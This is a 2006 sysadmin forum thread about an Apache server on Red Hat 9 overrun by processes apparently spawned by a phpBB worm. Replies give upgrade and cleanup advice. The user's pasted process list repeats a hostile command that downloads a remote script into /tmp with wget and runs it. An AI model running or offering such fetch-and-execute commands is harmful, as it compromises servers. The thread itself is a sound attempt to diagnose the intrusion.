Apache problem

novice06 · 04-10-2006, 11:51 PM

Hi,

My Apache is running on Redhat 9.
Apache is daily by daily memory out. not down.
I think memory is consumed by other processes.
This process is not by me.

28673 apache 4164 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
28743 apache 4164 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
28900 apache 4164 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
29059 apache 4164 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
28604 apache 4160 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
28685 apache 4160 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
28746 apache 4160 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
29064 apache 4160 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
29086 apache 4160 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
29288 apache 4160 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...
29868 apache 4160 kB sh -c wget http://www.bob-ma.org/modules/Forums/admin/pulax.txt -O /tmp/.791; pe ...

these are some of that processes.
now my server memory is very rare.
I kill them but new threads are occur. so never end.

I trace this process. This source from PhpBB what i hosted.
I check my phpbb noone using is forum.

what should i do for this processes?

please send me suggestion.

Thanks,
novice06

zeitounator · 04-11-2006, 04:29 AM

In my opinion, this looks like you're victim of a worm attacking phpbb 2.0.10 and earlier... You should upgrade. See:
http://isc.sans.org/diary.php?date=2004-12-21

novice06 · 04-11-2006, 04:52 AM

Hi,

After i check my phpBB is 2.0.18, so no need to upgrade?
My problem is exactly the same as your doc.
But in these doc, not explain how to stop or remove.
Please suggest what should i carry on.

Thanks
novice06

novice06 · 04-12-2006, 09:33 PM

Thanks,

your suggestion is great.
after i reinstall phpBB, problem solved.

novice06

Capt_Caveman · 04-13-2006, 06:52 AM

Have you identified and removed the worm/script that was executing those commands? Looking at the requests, /tmp would be a good place to start. I'd also look for any files owned by "apache" outside the document root (find / -user apache).